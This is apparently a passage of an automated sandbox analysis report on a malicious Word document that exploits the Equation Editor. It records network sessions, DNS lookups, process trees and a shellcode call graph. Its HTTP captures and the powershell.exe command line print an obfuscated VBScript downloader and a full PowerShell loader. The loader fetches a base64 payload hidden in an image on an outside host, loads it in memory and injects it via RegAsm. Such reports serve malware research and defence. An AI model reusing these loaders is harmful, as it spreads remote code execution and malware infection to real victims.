    Jul 3, 2024 11:08:41.744010925 CEST804916123.95.235.16192.168.2.22
    Jul 3, 2024 11:08:42.209574938 CEST804916123.95.235.16192.168.2.22
    Jul 3, 2024 11:08:42.209592104 CEST804916123.95.235.16192.168.2.22
    Jul 3, 2024 11:08:42.209610939 CEST804916123.95.235.16192.168.2.22
    Jul 3, 2024 11:08:42.209621906 CEST804916123.95.235.16192.168.2.22
    Jul 3, 2024 11:08:42.209706068 CEST4916180192.168.2.2223.95.235.16
    Jul 3, 2024 11:08:42.209882021 CEST4916180192.168.2.2223.95.235.16
    Jul 3, 2024 11:08:42.543200016 CEST4916280192.168.2.2291.92.254.29
    Jul 3, 2024 11:08:42.548134089 CEST804916291.92.254.29192.168.2.22
    Jul 3, 2024 11:08:42.548201084 CEST4916280192.168.2.2291.92.254.29
    Jul 3, 2024 11:08:42.548866987 CEST4916280192.168.2.2291.92.254.29
    Jul 3, 2024 11:08:42.553628922 CEST804916291.92.254.29192.168.2.22
    Jul 3, 2024 11:08:43.098459959 CEST4916180192.168.2.2223.95.235.16
    Jul 3, 2024 11:08:43.238446951 CEST804916291.92.254.29192.168.2.22
    Jul 3, 2024 11:08:43.238492012 CEST804916291.92.254.29192.168.2.22
    Jul 3, 2024 11:08:43.238507032 CEST804916291.92.254.29192.168.2.22
    Jul 3, 2024 11:08:43.238575935 CEST4916280192.168.2.2291.92.254.29
    Jul 3, 2024 11:08:46.218270063 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:46.218317032 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.218385935 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:46.223527908 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:46.223547935 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.687376022 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.687441111 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:46.692166090 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:46.692176104 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.692527056 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.751250029 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:46.796500921 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.854789019 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.854831934 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.854857922 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.854902983 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:46.854921103 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.859340906 CEST44349163188.114.96.3192.168.2.22
    Jul 3, 2024 11:08:46.859395027 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:46.860848904 CEST49163443192.168.2.22188.114.96.3
    Jul 3, 2024 11:08:48.655133009 CEST804916291.92.254.29192.168.2.22
    Jul 3, 2024 11:08:48.655195951 CEST4916280192.168.2.2291.92.254.29
    Jul 3, 2024 11:08:48.655332088 CEST4916280192.168.2.2291.92.254.29
    Jul 3, 2024 11:08:48.663918018 CEST804916291.92.254.29192.168.2.22
    TimestampSource PortDest PortSource IPDest IP
    Jul 3, 2024 11:08:45.996385098 CEST5456253192.168.2.228.8.8.8
    Jul 3, 2024 11:08:46.208631039 CEST53545628.8.8.8192.168.2.22
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Jul 3, 2024 11:08:45.996385098 CEST192.168.2.228.8.8.80x8f7aStandard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Jul 3, 2024 11:08:46.208631039 CEST8.8.8.8192.168.2.220x8f7aNo error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
    Jul 3, 2024 11:08:46.208631039 CEST8.8.8.8192.168.2.220x8f7aNo error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
    • uploaddeimagens.com.br
    • 23.95.235.16
    • 91.92.254.29
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.224916123.95.235.16802436C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    TimestampBytes transferredDirectionData
    Jul 3, 2024 11:08:41.739130020 CEST330OUTGET /33011/greatideaforfollowers.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 23.95.235.16
    Connection: Keep-Alive
    Jul 3, 2024 11:08:42.209574938 CEST1236INHTTP/1.1 200 OK
    Date: Wed, 03 Jul 2024 09:08:42 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
    Last-Modified: Wed, 03 Jul 2024 07:43:29 GMT
    ETag: "da2-61c52fc81f10f"
    Accept-Ranges: bytes
    Content-Length: 3490
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-gzip
    Data Raw: ff fe 44 00 69 00 6d 00 20 00 69 00 4c 00 47 00 4c 00 70 00 5a 00 4c 00 51 00 47 00 4b 00 4a 00 4e 00 63 00 62 00 4b 00 50 00 63 00 71 00 5a 00 4e 00 50 00 63 00 6b 00 4e 00 47 00 4b 00 4e 00 50 00 75 00 6e 00 4b 00 4e 00 61 00 63 00 76 00 4b 00 5a 00 4b 00 6e 00 64 00 47 00 4c 00 5a 00 4b 00 61 00 57 00 57 00 43 00 4c 00 66 00 6b 00 6c 00 50 00 63 00 6d 00 62 00 6e 00 61 00 4c 00 57 00 68 00 4e 00 49 00 5a 00 61 00 51 00 63 00 74 00 6b 00 4a 00 57 00 47 00 42 00 63 00 64 00 6c 00 55 00 69 00 5a 00 57 00 41 00 68 00 78 00 4c 00 51 00 64 00 4b 00 6c 00 52 00 42 00 41 00 69 00 4c 00 66 00 4a 00 4b 00 4b 00 51 00 63 00 57 00 2c 00 20 00 52 00 76 00 67 00 6f 00 7a 00 43 00 4e 00 4c 00 42 00 55 00 4f 00 4c 00 41 00 6c 00 47 00 57 00 64 00 65 00 4c 00 70 00 75 00 47 00 70 00 57 00 71 00 72 00 50 00 42 00 63 00 63 00 75 00 69 00 74 00 62 00 47 00 57 00 66 00 57 00 6b 00 52 00 75 00 55 00 7a 00 4b 00 4f 00 78 00 78 00 52 00 69 00 6f 00 55 00 4b 00 57 00 61 00 4c 00 42 00 57 00 70 00 53 00 55 00 76 00 42 00 [TRUNCATED]
    Data Ascii: Dim iLGLpZLQGKJNcbKPcqZNPckNGKNPunKNacvKZKndGLZKaWWCLfklPcmbnaLWhNIZaQctkJWGBcdlUiZWAhxLQdKlRBAiLfJKKQcW, RvgozCNLBUOLAlGWdeLpuGpWqrPBccuitbGWfWkRuUzKOxxRioUKWaLBWpSUvBTcSqnbfZoWbpPkZdNqLjcLZGaiGGaWriGedAziSet iLGLpZLQGKJNcbKPcqZNPckNGKNPunKNacvKZKndGLZKaWWCLfklPcmbnaLWhNIZaQctkJWGBcdlUiZWAhxLQdKlRBAiLfJKKQcW = CreateObject("MSXML2.ServerXMLHTTP")iLGLpZLQGKJNcbKPcqZNPckNGKNPunKNacvKZKndGLZKaWWCLfklPcmbnaLWhNIZaQctkJWGBcdlUiZWAhxLQdKlRBAiLfJKKQcW.Open
    Jul 3, 2024 11:08:42.209592104 CEST224INData Raw: 00 20 00 22 00 47 00 45 00 54 00 22 00 2c 00 20 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 39 00 31 00 2e 00 39 00 32 00 2e 00 32 00 35 00 34 00 2e 00 32 00 39 00 2f 00 55 00 73 00 65 00 72 00 73 00 5f 00 41 00 50 00 49 00 2f 00 73 00 79
    Data Ascii: "GET", "http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt", FalseiLGLpZLQGKJNcbKPcqZNPckNGKNPunKNac
    Jul 3, 2024 11:08:42.209610939 CEST1236INData Raw: 00 76 00 4b 00 5a 00 4b 00 6e 00 64 00 47 00 4c 00 5a 00 4b 00 61 00 57 00 57 00 43 00 4c 00 66 00 6b 00 6c 00 50 00 63 00 6d 00 62 00 6e 00 61 00 4c 00 57 00 68 00 4e 00 49 00 5a 00 61 00 51 00 63 00 74 00 6b 00 4a 00 57 00 47 00 42 00 63 00 64
    Data Ascii: vKZKndGLZKaWWCLfklPcmbnaLWhNIZaQctkJWGBcdlUiZWAhxLQdKlRBAiLfJKKQcW.SendIf iLGLpZLQGKJNcbKPcqZNPckNGKNPunKNacvKZKndGLZKa
    Jul 3, 2024 11:08:42.209621906 CEST1113INData Raw: 00 6b 00 70 00 78 00 47 00 61 00 6b 00 68 00 72 00 47 00 63 00 61 00 55 00 4c 00 63 00 68 00 71 00 43 00 4b 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 57 00 53 00 63 00 72 00 69 00 70
    Data Ascii: kpxGakhrGcaULchqCK = CreateObject("WScript.Shell") KWxacKaockHfcWSKleKGcNepvPjbGziSGZLhlmkLdivcGWaPNkWmNbLLULixKkdWp


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.224916291.92.254.29803140C:\Windows\SysWOW64\wscript.exe
    TimestampBytes transferredDirectionData
    Jul 3, 2024 11:08:42.548866987 CEST209OUTGET /Users_API/syscore/file_xgep41gp.dyp.txt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: 91.92.254.29
    Jul 3, 2024 11:08:43.238446951 CEST1236INHTTP/1.1 200 OK
    Date: Wed, 03 Jul 2024 09:08:43 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Wed, 03 Jul 2024 07:43:29 GMT
    ETag: "584-61c52fc8141e5"
    Accept-Ranges: bytes
    Content-Length: 1412
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/plain
    Data Raw: ef bb bf 2e 20 28 20 24 56 45 72 62 6f 53 65 50 72 65 46 45 72 45 6e 63 65 2e 54 6f 73 54 52 69 6e 67 28 29 5b 31 2c 33 5d 2b 27 58 27 2d 4a 6f 69 4e 27 27 29 28 20 28 28 27 39 34 59 6c 69 6e 6b 20 3d 20 59 4b 6f 68 74 74 70 73 3a 2f 2f 75 70 6c 6f 61 64 64 65 69 6d 61 67 65 6e 73 2e 63 6f 6d 2e 62 72 2f 69 6d 61 67 65 73 2f 27 2b 27 30 30 34 2f 38 30 37 2f 30 35 33 2f 6f 72 69 67 69 6e 61 27 2b 27 6c 2f 6e 65 77 5f 69 6d 61 67 65 2e 27 2b 27 6a 70 67 3f 31 37 31 39 38 34 36 32 33 35 59 4b 6f 3b 20 39 34 59 77 65 62 43 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 27 2b 27 6e 74 3b 20 74 72 79 20 7b 20 39 34 59 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 3d 20 39 34 59 77 65 62 43 6c 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 39 34 59 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 20 7b 20 57 72 69 74 65 2d 48 6f 73 74 20 59 4b 6f 46 61 69 6c 65 64 20 54 6f 20 64 6f 77 6e 6c 6f 61 64 20 64 61 74 61 20 66 72 6f 6d 20 39 34 59 6c 69 [TRUNCATED]
    Data Ascii: . ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'B
    Jul 3, 2024 11:08:43.238492012 CEST487INData Raw: 79 74 65 73 20 3d 20 5b 53 79 27 2b 27 73 74 27 2b 27 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 27 2b 27 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 39 34 59 62 61 73 65 36 34 43 6f 6d 6d 61 6e 64 29 3b 20 39 34 59 6c 6f 61 64 65 64 41 73 73
    Data Ascii: ytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo
    Jul 3, 2024 11:08:43.238507032 CEST487INData Raw: 79 74 65 73 20 3d 20 5b 53 79 27 2b 27 73 74 27 2b 27 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 27 2b 27 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 39 34 59 62 61 73 65 36 34 43 6f 6d 6d 61 6e 64 29 3b 20 39 34 59 6c 6f 61 64 65 64 41 73 73
    Data Ascii: ytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.2249163188.114.96.34433200C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    TimestampBytes transferredDirectionData
    2024-07-03 09:08:46 UTC124OUTGET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1
    Host: uploaddeimagens.com.br
    Connection: Keep-Alive
    2024-07-03 09:08:46 UTC587INHTTP/1.1 200 OK
    Date: Wed, 03 Jul 2024 09:08:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=812CT7Mlh7uemSEQ3xNxaq6Bsjl5ameX5m2zBlXa%2BL0%2FWtgv1fhHfuYHdjHK3MUtDteADZ9Y%2BOLmv9IvQSjA3HfxG7AGkNaTpEYojdf%2BAU19vvH91GlFezghBNAmnEjj%2B9098nyudZCw"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89d5bba08feb8c8a-EWR
    alt-svc: h3=":443"; ma=86400
    2024-07-03 09:08:46 UTC782INData Raw: 31 31 35 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
    Data Ascii: 115e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
    2024-07-03 09:08:46 UTC1369INData Raw: 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b
    Data Ascii: tyles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cook
    2024-07-03 09:08:46 UTC1369INData Raw: 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 4f 50 52 63 78 71 74 5a 53 65 56 31 6d 61 48 4a 52 69 5f 7a 5a 5a 4c 73 6a 66 4c 47 77 66 50 63 30 47 4e 52 6c 43 57 57 56 76 67 2d 31 37 31 39 39 39 37 37 32 36 2d 30 2e 30 2e 31 2e 31 2d 2f 69 6d 61 67 65 73 2f 30 30 34 2f 38 30 37 2f 30 35 33 2f 6f 72 69 67 69 6e 61 6c 2f 6e 65 77 5f 69 6d 61 67 65 2e 6a 70 67 3f 31 37 31 39 38 34 36 32 33 35 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70
    Data Ascii: hod="GET" enctype="text/plain"> <input type="hidden" name="atok" value="OPRcxqtZSeV1maHJRi_zZZLsjfLGwfPc0GNRlCWWVvg-1719997726-0.0.1.1-/images/004/807/053/original/new_image.jpg?1719846235"> <a href="http
    2024-07-03 09:08:46 UTC934INData Raw: 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
    Data Ascii: hidden" id="cf-footer-ip">8.46.123.33</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https:
    2024-07-03 09:08:46 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:05:08:37
    Start date:03/07/2024
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13f030000
    File size:1'423'704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:2
    Start time:05:08:38
    Start date:03/07/2024
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543'304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:5
    Start time:05:08:41
    Start date:03/07/2024
    Path:C:\Windows\SysWOW64\wscript.exe
    Wow64 process (32bit):true
    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"
    Imagebase:0x90000
    File size:141'824 bytes
    MD5 hash:979D74799EA6C8B8167869A68DF5204A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:6
    Start time:05:08:42
    Start date:03/07/2024
    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):true
    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"
    Imagebase:0x1010000
    File size:427'008 bytes
    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:8
    Start time:05:09:00
    Start date:03/07/2024
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543'304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Reset < >

      Execution Graph

      Execution Coverage:20.1%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:58.7%
      Total number of Nodes:46
      Total number of Limit Nodes:3
      execution_graph 253 35105c0 254 35105c2 253->254 257 35105d5 LoadLibraryW 254->257 262 35105ef 257->262 263 35105f2 262->263 265 3510600 263->265 266 3510668 URLDownloadToFileW 263->266 276 3510681 266->276 269 3510688 271 3510690 ShellExecuteW 269->271 273 35106f5 269->273 274 35106af 271->274 285 35106bb 271->285 273->265 274->273 275 35106be ExitProcess 274->275 277 3510683 276->277 278 3510696 3 API calls 277->278 279 3510688 278->279 280 3510690 ShellExecuteW 279->280 282 3510671 279->282 281 35106bb ExitProcess 280->281 283 35106af 280->283 281->283 282->269 287 3510696 282->287 283->282 284 35106be ExitProcess 283->284 286 35106be ExitProcess 285->286 288 3510699 ShellExecuteW 287->288 289 35106bb ExitProcess 288->289 290 35106af 289->290 291 35106f6 290->291 292 35106be ExitProcess 290->292 291->269 293 35106c2 GetPEB 294 35106d0 293->294 295 351050a ExitProcess 302 3510523 295->302 303 3510529 302->303 306 3510530 303->306 308 351053f 303->308 305 3510578 306->305 315 35105c0 306->315 309 3510545 308->309 319 3510566 309->319 316 35105c2 315->316 317 35105d5 9 API calls 316->317 318 35105c7 317->318 320 3510569 319->320 321 35105c0 9 API calls 320->321 322 3510578 321->322

      Callgraph

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 3510668-3510682 URLDownloadToFileW call 3510681 4 3510688-351068e 0->4 5 3510683 call 3510696 0->5 6 3510690-35106a8 ShellExecuteW 4->6 7 35106f5-3510701 4->7 5->4 8 35106af-35106b0 6->8 9 35106aa call 35106bb 6->9 10 3510704 7->10 13 35106b2 8->13 14 351071b-351071f 8->14 9->8 11 3510706-351070a 10->11 12 351070c-3510710 10->12 11->12 15 3510718 11->15 16 3510712-3510716 12->16 17 3510725-3510727 12->17 13->10 20 35106b4 13->20 18 3510721 14->18 19 3510723 14->19 15->14 16->15 16->17 21 3510737-3510738 17->21 18->17 19->17 23 3510729-3510732 19->23 20->17 22 35106b6-35106c0 ExitProcess 20->22 26 3510734 23->26 27 35106fb-35106fe 23->27 26->21 27->23 29 3510700 27->29 29->10
      APIs
      • URLDownloadToFileW.URLMON(00000000,03510600,?,00000000,00000000), ref: 0351066A
        • Part of subcall function 03510681: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035106A8
        • Part of subcall function 03510681: ExitProcess.KERNEL32(00000000), ref: 035106C0
      Memory Dump Source
      • Source File: 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp, Offset: 03510000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3510000_EQNEDT32.jbxd
      Similarity
      • API ID: DownloadExecuteExitFileProcessShell
      • String ID:
      • API String ID: 3584569557-0
      • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
      • Instruction ID: 0843e7daa6e334d2e1a82b20eb105b924141c8c27679f5987c788f775e36cce0
      • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
      • Instruction Fuzzy Hash: 40F02791A5C34029F621F7742C9EF6A6F28BFC1700F15088AF1465F0F3D8D488A086AA

      Control-flow Graph

      • Executed
      • Not Executed
